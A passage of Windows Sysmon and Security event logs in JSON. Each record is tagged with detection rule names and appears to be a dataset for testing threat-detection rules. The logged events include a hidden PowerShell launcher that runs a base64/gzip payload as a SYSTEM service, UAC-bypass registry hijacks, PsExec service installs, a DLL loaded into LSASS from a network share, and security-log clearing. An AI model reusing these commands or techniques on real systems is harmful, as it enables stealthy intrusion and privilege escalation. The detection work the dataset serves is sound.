cleared"],"event":{"Event":{"System":{"Channel":"Security","Computer":"PC04.example.corp","Correlation":null,"EventID":1102,"EventRecordID":6272,"Execution_attributes":{"ProcessID":792,"ThreadID":3120},"Keywords":"0x4020000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"{fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148}","Name":"Microsoft-Windows-Eventlog"},"Security":null,"Task":104,"TimeCreated_attributes":{"SystemTime":"2019-03-17T19:26:42.116688Z"},"Version":0},"UserData":{"LogFileCleared":{"SubjectDomainName":"PC04","SubjectLogonId":"0x128a9","SubjectUserName":"IEUser","SubjectUserSid":"S-1-5-21-3583694148-1414552638-2922671848-1000"},"LogFileCleared_attributes":{"xmlns":"http://manifests.microsoft.com/win/2004/08/windows/eventlog","xmlns:auto-ns3":"http://schemas.microsoft.com/win/2004/08/events"}}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Registry Entries For Azorult Malware","DLL Load via LSASS"],"event":{"Event":{"EventData":{"Details":"\\\\172.16.66.254\\shared\\lsadb.dll","EventType":"SetValue","Image":"C:\\WINDOWS\\system32\\svchost.exe","ProcessGuid":"6A3C3EF2-E699-5F7C-0000-001048EF0000","ProcessId":404,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\Services\\NTDS\\DirectoryServiceExtPt","UtcTime":"2020-10-06 22:11:17.814"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"02694w-win10.threebeesco.com","Correlation":null,"EventID":13,"EventRecordID":345994,"Execution_attributes":{"ProcessID":10204,"ThreadID":2096},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2020-10-06T22:11:17.814931Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Hijack Legit RDP Session to Move Laterally","UAC 
Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2019-05-14 13:55:57.243","Image":"C:\\Windows\\system32\\mstsc.exe","ProcessGuid":"ECAD0485-C903-5CDA-0000-0010340F1000","ProcessId":2580,"RuleName":"","TargetFilename":"C:\\Users\\administrator\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\cmd.exe","UtcTime":"2019-05-14 14:04:05.696"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"alice.insecurebank.local","Correlation":null,"EventID":11,"EventRecordID":31145,"Execution_attributes":{"ProcessID":1580,"ThreadID":2324},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2019-05-14T14:04:05.697491Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Whoami Execution","Local Accounts Discovery"],"event":{"Event":{"EventData":{"CommandLine":"whoami","Company":"Microsoft Corporation","CurrentDirectory":"c:\\ProgramData\\","Description":"whoami - displays logged on user information","FileVersion":"6.1.7600.16385 
(win7_rtm.090713-1255)","Hashes":"SHA1=DC058F52AD8ACBD316827B6DCAC2434AB3CC515C,MD5=0EBF71E33EF09CA65D9683AFA999C473,SHA256=599EFD455AEEEFE2044A9B597061F271595033F5D0DF2C99DFDBCA8394BBCEC3,IMPHASH=C5352B949915AB8CD5E1844790D19274","Image":"C:\\Windows\\System32\\whoami.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-3991-5D0B-0000-002029350100","LogonId":"0x13529","ParentCommandLine":"\"cmd\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"365ABB72-3ED4-5D0B-0000-0010B2871A00","ParentProcessId":1440,"ProcessGuid":"365ABB72-3ED8-5D0B-0000-0010398F1A00","ProcessId":1476,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"IEWIN7\\IEUser","UtcTime":"2019-06-20 08:07:52.956"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":8119,"Execution_attributes":{"ProcessID":2020,"ThreadID":2088},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-06-20T08:07:52.956810Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Suspicious Svchost Process","Windows Processes Suspicious Parent Directory"],"event":{"Event":{"EventData":{"CommandLine":"C:\\Windows\\system32\\svchost.exe -k localService -p -s RemoteRegistry","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Host Process for Windows Services","FileVersion":"10.0.17763.1 
(WinBuild.160101.0800)","Hashes":"SHA1=A1385CE20AD79F55DF235EFFD9780C31442AA234,MD5=8A0A29438052FAED8A2532DA50455756,SHA256=7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6,IMPHASH=247B9220E5D9B720A82B2C8B5069AD69","Image":"C:\\Windows\\System32\\svchost.exe","IntegrityLevel":"System","LogonGuid":"747F3D96-3407-5FCB-0000-0020E5030000","LogonId":"0x3e5","OriginalFileName":"svchost.exe","ParentCommandLine":"?","ParentImage":"?","ParentProcessGuid":"00000000-0000-0000-0000-000000000000","ParentProcessId":612,"ProcessGuid":"747F3D96-BB00-5FCA-0000-001033CD7600","ProcessId":8536,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":0,"User":"NT AUTHORITY\\LOCAL SERVICE","UtcTime":"2020-12-04 22:41:04.465"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":549016,"Execution_attributes":{"ProcessID":3560,"ThreadID":4600},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2020-12-04T22:41:04.470207Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"C:\\Windows\\System32\\Rundll32.exe smssvc.dll,Start","EventType":"SetValue","Image":"C:\\Windows\\system32\\svchost.exe","ProcessGuid":"747F3D96-BB00-5FCA-0000-001033CD7600","ProcessId":8536,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\SUpdate","UtcTime":"2020-12-04 
22:41:04.544"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":549018,"Execution_attributes":{"ProcessID":3560,"ThreadID":4600},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2020-12-04T22:41:04.545145Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Registry Entries For Azorult Malware"],"event":{"Event":{"EventData":{"Details":"DWORD (0x00000003)","EventType":"SetValue","Image":"C:\\Windows\\system32\\services.exe","ProcessGuid":"365ABB72-2586-5CC9-0000-0010DC530000","ProcessId":460,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\services\\hello\\Start","UtcTime":"2019-04-30 20:26:51.934"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":13,"EventRecordID":9805,"Execution_attributes":{"ProcessID":1964,"ThreadID":1664},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-04-30T20:26:51.949839Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Registry Entries For Azorult Malware","PowerShell as a Service in Registry"],"event":{"Event":{"EventData":{"Details":"%%COMSPEC%% /b /c start /b /min powershell.exe -nop -w hidden -noni -c \"if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\\syswow64\\WindowsPowerShell\\v1.0\\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c 
&([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(''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''))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);\"","EventType":"SetValue","Image":"C:\\Windows\\system32\\services.exe","ProcessGuid":"365ABB72-2586-5CC9-0000-0010DC530000","ProcessId":460,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\services\\hello\\ImagePath","UtcTime":"2019-04-30 20:26:51.934"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":13,"EventRecordID":9806,"Execution_attributes":{"ProcessID":1964,"ThreadID":1664},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-04-30T20:26:51.981089Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule","Mimikatz Command Line","FromBase64String Command Line","Curl Start Combination","Encoded FromBase64String"],"event":{"Event":{"EventData":{"CommandLine":"C:\\Windows\\system32\\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden -noni -c \"if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\\syswow64\\WindowsPowerShell\\v1.0\\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object 
IO.MemoryStream(,[Convert]::FromBase64String(''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''))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows Command Processor","FileVersion":"6.1.7601.17514 (win7sp1_rtm.101119-1850)","Hashes":"SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"System","LogonGuid":"365ABB72-2586-5CC9-0000-0020E7030000","LogonId":"0x3e7","ParentCommandLine":"C:\\Windows\\system32\\services.exe","ParentImage":"C:\\Windows\\System32\\services.exe","ParentProcessGuid":"365ABB72-2586-5CC9-0000-0010DC530000","ParentProcessId":460,"ProcessGuid":"365ABB72-AF8B-5CC8-0000-00101C1A1900","ProcessId":3348,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":0,"User":"NT AUTHORITY\\SYSTEM","UtcTime":"2019-04-30 20:26:51.949"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":9807,"Execution_attributes":{"ProcessID":1964,"ThreadID":1664},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-04-30T20:26:52.090464Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule","Mimikatz Command Line","FromBase64String Command Line","Encoded 
FromBase64String"],"event":{"Event":{"EventData":{"CommandLine":"powershell.exe -nop -w hidden -noni -c \"if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\\syswow64\\WindowsPowerShell\\v1.0\\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(''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''))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows PowerShell","FileVersion":"6.1.7600.16385 (win7_rtm.090713-1255)","Hashes":"SHA1=04C5D2B4DA9A0F3FA8A45702D4256CEE42D8C48D,MD5=92F44E405DB16AC55D97E3BFE3B132FA,SHA256=6C05E11399B7E3C8ED31BAE72014CF249C144A8F4A2C54A758EB2E6FAD47AEC7,IMPHASH=96BA691B035D05F44E35AB23F6BA946C","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","IntegrityLevel":"System","LogonGuid":"365ABB72-2586-5CC9-0000-0020E7030000","LogonId":"0x3e7","ParentCommandLine":"C:\\Windows\\system32\\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden -noni -c \"if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\\syswow64\\WindowsPowerShell\\v1.0\\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object 
IO.MemoryStream(,[Convert]::FromBase64String(''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''))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"365ABB72-AF8B-5CC8-0000-00101C1A1900","ParentProcessId":3348,"ProcessGuid":"365ABB72-AF8B-5CC8-0000-0010AC1B1900","ProcessId":3872,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":0,"User":"NT AUTHORITY\\SYSTEM","UtcTime":"2019-04-30 20:26:51.965"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":9808,"Execution_attributes":{"ProcessID":1964,"ThreadID":1664},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-04-30T20:26:52.106089Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule","FromBase64String Command Line","Encoded FromBase64String"],"event":{"Event":{"EventData":{"CommandLine":"\"powershell.exe\" -noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String('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'))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows PowerShell","FileVersion":"6.1.7600.16385 
(win7_rtm.090713-1255)","Hashes":"SHA1=04C5D2B4DA9A0F3FA8A45702D4256CEE42D8C48D,MD5=92F44E405DB16AC55D97E3BFE3B132FA,SHA256=6C05E11399B7E3C8ED31BAE72014CF249C144A8F4A2C54A758EB2E6FAD47AEC7,IMPHASH=96BA691B035D05F44E35AB23F6BA946C","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","IntegrityLevel":"System","LogonGuid":"365ABB72-2586-5CC9-0000-0020E7030000","LogonId":"0x3e7","ParentCommandLine":"powershell.exe -nop -w hidden -noni -c \"if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\\syswow64\\WindowsPowerShell\\v1.0\\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(''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''))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);\"","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"365ABB72-AF8B-5CC8-0000-0010AC1B1900","ParentProcessId":3872,"ProcessGuid":"365ABB72-AF8C-5CC8-0000-001003361900","ProcessId":2484,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":0,"User":"NT AUTHORITY\\SYSTEM","UtcTime":"2019-04-30 
20:26:52.356"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":9809,"Execution_attributes":{"ProcessID":1964,"ThreadID":1664},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-04-30T20:26:52.356089Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Registry Entries For Azorult Malware"],"event":{"Event":{"EventData":{"Details":"DWORD (0x00000004)","EventType":"SetValue","Image":"C:\\Windows\\system32\\services.exe","ProcessGuid":"365ABB72-2586-5CC9-0000-0010DC530000","ProcessId":460,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\services\\hello\\Start","UtcTime":"2019-04-30 20:26:53.168"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":13,"EventRecordID":9812,"Execution_attributes":{"ProcessID":1964,"ThreadID":1664},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-04-30T20:26:53.199839Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["PsExec Tool Execution"],"event":{"Event":{"EventData":{"CreationUtcTime":"2020-08-27 11:40:56.396","Image":"System","ProcessGuid":"B5CF5917-721E-5F46-0000-0010EB030000","ProcessId":4,"RuleName":"","TargetFilename":"C:\\Windows\\PSEXESVC.exe","UtcTime":"2020-08-27 
11:40:56.396"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"04246w-win10.threebeesco.com","Correlation":null,"EventID":11,"EventRecordID":263572,"Execution_attributes":{"ProcessID":2580,"ThreadID":4144},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2020-08-27T11:40:56.397086Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["PsExec Service Start"],"event":{"Event":{"EventData":{"CommandLine":"C:\\WINDOWS\\PSEXESVC.exe","Company":"Sysinternals","CurrentDirectory":"C:\\WINDOWS\\system32\\","Description":"PsExec Service","FileVersion":"2.2","Hashes":"SHA1=A17C21B909C56D93D978014E63FB06926EAEA8E7,MD5=75B55BB34DAC9D02740B9AD6B6820360,SHA256=141B2190F51397DBD0DFDE0E3904B264C91B6F81FEBC823FF0C33DA980B69944,IMPHASH=67012475995FB9027F4511245B57DDEA","Image":"C:\\Windows\\PSEXESVC.exe","IntegrityLevel":"System","LogonGuid":"B5CF5917-7237-5F46-0000-0020E7030000","LogonId":"0x3e7","ParentCommandLine":"C:\\WINDOWS\\system32\\services.exe","ParentImage":"C:\\Windows\\System32\\services.exe","ParentProcessGuid":"B5CF5917-7236-5F46-0000-001058880000","ParentProcessId":632,"ProcessGuid":"B5CF5917-9BC8-5F47-0000-001042AB2001","ProcessId":4320,"Product":"Sysinternals PsExec","RuleName":"","TerminalSessionId":0,"User":"NT AUTHORITY\\SYSTEM","UtcTime":"2020-08-27 
11:40:56.610"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"04246w-win10.threebeesco.com","Correlation":null,"EventID":1,"EventRecordID":263573,"Execution_attributes":{"ProcessID":2580,"ThreadID":4144},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2020-08-27T11:40:56.625194Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Registry Entries For Azorult Malware"],"event":{"Event":{"EventData":{"Details":"Binary Data","EventType":"SetValue","Image":"C:\\Windows\\system32\\reg.exe","ProcessGuid":"365ABB72-0B9E-5D1D-0000-00100BF40D00","ProcessId":3844,"RuleName":"Lateral Movement - New Named Pipe added to NullSession","TargetObject":"HKLM\\System\\CurrentControlSet\\services\\LanmanServer\\Parameters\\NullSessionPipes","UtcTime":"2019-07-03 20:10:06.459"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":13,"EventRecordID":8228,"Execution_attributes":{"ProcessID":112,"ThreadID":2084},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-07-03T20:10:06.475561Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event 
Viewer"],"event":{"Event":{"EventData":{"Details":"c:\\users\\ieuser\\appdata\\local\\temp","EventType":"SetValue","Image":"c:\\python27\\python.exe","ProcessGuid":"365ABB72-6CE5-5CD5-0000-00104BC61B00","ProcessId":4076,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3583694148-1414552638-2922671848-1000\\Volatile Environment\\SYSTEMROOT","UtcTime":"2019-05-10 12:21:57.270"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":13,"EventRecordID":15635,"Execution_attributes":{"ProcessID":2016,"ThreadID":2012},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-05-10T12:21:57.286666Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2019-05-10 12:06:06.896","Image":"c:\\python27\\python.exe","ProcessGuid":"365ABB72-6CE5-5CD5-0000-00104BC61B00","ProcessId":4076,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData\\Local\\Temp\\system32\\mmc.exe","UtcTime":"2019-05-10 
12:22:02.434"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":11,"EventRecordID":15636,"Execution_attributes":{"ProcessID":2016,"ThreadID":2012},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2019-05-10T12:22:02.434314Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2019-08-03 11:23:15.519","Image":"C:\\Windows\\explorer.exe","ProcessGuid":"747F3D96-6EA3-5D45-0000-0010204DE100","ProcessId":7984,"RuleName":"PrivEsc - UAC Bypass UACME 30","TargetFilename":"C:\\Users\\IEUser\\AppData\\Local\\Temp\\wow64log.dll","UtcTime":"2019-08-03 11:23:15.519"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":5401,"Execution_attributes":{"ProcessID":2780,"ThreadID":3676},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2019-08-03T11:23:15.560614Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event 
Viewer"],"event":{"Event":{"EventData":{"Details":"C:\\windows\\system32\\cmd.exe","EventType":"SetValue","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ProcessGuid":"365ABB72-9570-5CD3-0000-00103FC90A00","ProcessId":1900,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3583694148-1414552638-2922671848-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\App Paths\\control.exe\\(Default)","UtcTime":"2019-05-09 03:25:24.552"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":13,"EventRecordID":11264,"Execution_attributes":{"ProcessID":1988,"ThreadID":228},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-05-09T03:25:24.630445Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Sdclt Child Processes"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\System32\\cmd.exe\" /name Microsoft.BackupAndRestoreCenter","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Users\\IEUser\\AppData\\Local\\Temp\\onedrive\\","Description":"Windows Command Processor","FileVersion":"6.1.7601.17514 